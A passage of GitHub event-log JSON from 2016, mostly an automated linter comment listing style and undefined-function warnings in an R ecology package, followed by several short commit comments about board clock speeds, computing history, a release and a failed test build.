\n^\n```\n[R/ESF_function.R:43:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L43) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:45:13:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L45) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/ESF_function.R:47:15:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:71:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:71:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L71) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:74:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L74) *warning:* **local variable ‘S’ assigned but may not be used**\n```r\n​  S <- length(abund)\n  ^\n```\n[R/ESF_function.R:78:24:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:78:28:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                           ^~\n```\n[R/ESF_function.R:78:29:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor <- lgamma(J+1) -( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                            ^\n```\n[R/ESF_function.R:79:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L79) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/ESF_function.R:81:15:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:81:16:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L81) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:4:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L83) *style:* **Trailing whitespace is superfluous.**\n```r\n​  }  \n   ^~\n```\n[R/ESF_function.R:84:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L84) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ESF_function.R:85:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/ESF_function.R#L85) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:4:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​  ny <- 1-v\n        ~^~\n```\n[R/evaluateLogLik2.R:5:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/evaluateLogLik2.R:6:27:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/evaluateLogLik2.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L7) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/evaluateLogLik2.R:11:6:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in seq_along(I_X)) {\n     ^\n```\n[R/evaluateLogLik2.R:17:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n        ^\n```\n[R/evaluateLogLik2.R:17:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n               ~^~\n```\n[R/evaluateLogLik2.R:17:39:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n                                      ^\n```\n[R/evaluateLogLik2.R:17:47:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​  l <- ((theta_x/2) - 1) * log(nx) + ((theta_y/2) - 1) * log(ny)\n                                             ~^~\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x/2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:19:42:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x/2), KDA_X)\n                                        ~^~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y/2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:42:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y/2), KDA_Y)\n                                        ~^~\n```\n[R/evaluateLogLik2.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/evaluateLogLik2.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​prestonSort <- function(A) {\n^~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L3) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:4:6:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L4) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(k in 1:length(output)) {\n     ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k-1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k-1)\n               ^\n```\n[R/expected.R:5:18:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k-1)\n                ~^~\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/expected.R:25:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(m < 0) {\n    ^\n```\n[R/expected.R:29:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(m > 1) {\n    ^\n```\n[R/expected.R:33:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/expected.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L37) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:38:5:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L38) *style:* **Use <-, not =, for assignment.**\n```r\n​  I = (J-1)* m / (1-m)\n    ^\n```\n[R/expected.R:38:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​  I = (J-1)* m / (1-m)\n       ~^~\n```\n[R/expected.R:38:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​  I = (J-1)* m / (1-m)\n          ~^\n```\n[R/expected.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​  I = (J-1)* m / (1-m)\n                  ~^~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L39) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:40:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  SAD <- prestonSort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:40:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L40) *warning:* **no visible global function definition for ‘prestonSort’**\n```r\n​  SAD <- prestonSort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L44) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:46:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanX <- rep(0, J)\n  ^~~~~\n```\n[R/expected.R:47:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L47) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanY <- rep(0, J)\n  ^~~~~\n```\n[R/expected.R:50:8:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L50) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:50:19:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:51:21:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L51) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n                    ^\n```\n[R/expected.R:51:38:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in 1:length(M$guildX)) {\n                                     ^~~~~~\n```\n[R/expected.R:52:25:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                        ^~~~~\n```\n[R/expected.R:52:34:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:52:37:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                                    ^~~~~\n```\n[R/expected.R:52:50:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanX[m] <- meanX[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:54:21:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L54) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n                    ^\n```\n[R/expected.R:54:38:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in 1:length(M$guildY)) {\n                                     ^~~~~~\n```\n[R/expected.R:55:25:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                        ^~~~~\n```\n[R/expected.R:55:34:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L55) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:55:37:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                                    ^~~~~\n```\n[R/expected.R:55:50:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanY[m] <- meanY[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:58:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanX <- meanX / n_replicates\n  ^~~~~\n```\n[R/expected.R:58:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L58) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanX <- meanX / n_replicates\n           ^~~~~\n```\n[R/expected.R:59:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L59) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanY <- meanY / n_replicates\n  ^~~~~\n```\n[R/expected.R:59:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L59) *style:* **Variable and function names should be all lowercase.**\n```r\n​  meanY <- meanY / n_replicates\n           ^~~~~\n```\n[R/expected.R:61:3:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​  gX <- prestonSort(meanX)\n  ^~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​  gX <- prestonSort(meanX)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L61) *warning:* **no visible global function definition for ‘prestonSort’**\n```r\n​  gX <- prestonSort(meanX)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:21:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/expected.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​  gX <- prestonSort(meanX)\n                    ^~~~~\n```\n"}},"created_at":"2016-09-22T16:15:20Z"}
{"id":"4603506306","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19132848,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T16:15:32Z","updated_at":"2016-09-22T16:15:32Z","body":"> Can you add the 480 MHz back?\r\n\r\nAdded to my TODO list\r\n\r\n> And decide whether you want to set BPi M2+ back to 816 MHz while you're at it (no opinion on that, our thermal experiments said it would be necessary when people are trying out mainline but OTH I don't care about this board at all)\r\n\r\nSorry, didn't pay much attention to this board, so I don't have any opinion on this too"}},"created_at":"2016-09-22T16:15:32Z"}
{"id":"4603510945","type":"CommitCommentEvent","actor":{"login":"KeremAtak"},"repo":{"name":"humppa/jtkt-2016"},"payload":{"comment":{"id":19132857,"position":28,"line":35,"path":"jtkt-2/development-of-computers-and-computing.tex","commit_id":"d7fc595d9821c2393d7372d5a45fa94538f9b600","created_at":"2016-09-22T16:16:17Z","updated_at":"2016-09-22T16:16:17Z","body":"The development of such big mainframe devices in the 1940's continued in the next decade as computers became more advanced and new programming languages were created. Computer Science started to separate itself more from mathematics. Universities started teaching it as a separate subject. In 1953 University of Cambridge introduced Cambridge Diploma in Computer Science, a full-year course that was the first of its kind. \r\n\r\nThe vision of a personal computer, PC, was demonstrated in the late 1960's. First prototypes of PC's emerged, and these were designed to be used by a single person. While they did not take off in people's homes until decades later, they were first adopted by businesses. PC's were used in various tasks such as accounting, forecasting and database management: they truly became invaluable tools for businesses."}},"created_at":"2016-09-22T16:16:17Z"}
{"id":"4603510968","type":"CommitCommentEvent","actor":{"login":"solnic"},"repo":{"name":"dry-rb/dry-validation"},"payload":{"comment":{"id":19132858,"position":null,"line":null,"path":null,"commit_id":"54d073ba1e544022f05f6f982203bb1703eb9ccf","created_at":"2016-09-22T16:16:18Z","updated_at":"2016-09-22T16:16:18Z","body":"@ramanbuttar 0.10.1 released :)"}},"created_at":"2016-09-22T16:16:18Z"}
{"id":"4603522546","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19132888,"position":null,"line":null,"path":null,"commit_id":"04316b240d6c0f317369ed9cd9f151d826d2f0f8","created_at":"2016-09-22T16:18:11Z","updated_at":"2016-09-22T16:18:11Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.256.04316b240d6c0f317369ed9cd9f151d826d2f0f8](http://build.palaso.org/viewLog.html?buildId=77057&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 1288, ignored: 17 Build time: 00:03:23\n### Failed tests\n```\nGlyssenTests.dll: GlyssenTests.Bundle.GlyssenDblTextMetadataTests.Serialize: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T16:18:11Z"}
{"id":"4603523117","type":"CommitCommentEvent","actor":{"login":"gilesbradshaw"},"repo":{"name":"gilesbradshaw/react-redux-training"},"payload":{"comment":{"id":19132889,"position":4,"line":24,"path":"package.json","commit_id":"718aa20787750925f6e087e491d4bb91ae6add81","created_at":"2016-09-22T16:18:17Z","updated_at":"2016-09-22T16:18:17Z","body":"we are using two new libraries - google them!"}},"created_at":"2016-09-22T16:18:17Z"}
